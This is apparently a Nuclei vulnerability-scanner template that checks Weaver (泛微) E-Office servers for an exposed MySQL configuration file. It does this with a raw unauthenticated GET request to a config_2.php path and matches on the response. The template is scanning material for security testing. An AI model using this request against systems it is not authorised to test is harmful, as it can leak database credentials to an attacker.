id: mysql_infotmation_Leak
info:
  name: 泛微 E-Office mysql配置文件泄露
  author: weehhd
  severity: medium
  description: https://mp.weixin.qq.com/s/tOnPpW9Sv-6xCUL9GBlIww
  reference:
    - https://
  tags: tags
http:
  - raw:
      - |+
        GET /building/backmgr/urlpage/mobileurl/config_2.php HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9,en-CN;q=0.8,en;q=0.7
        Cookie: LOGIN_LANG=cn; PHPSESSID=d0a2b84d569c808c0bc2105564f9a94b
        Connection: close

    matchers-condition: and
    matchers:
      - type: binary
        part: body
        binary:
          - 09093c74
      - type: word
        part: header
        words:
          - HTTP/1.1 200 OK
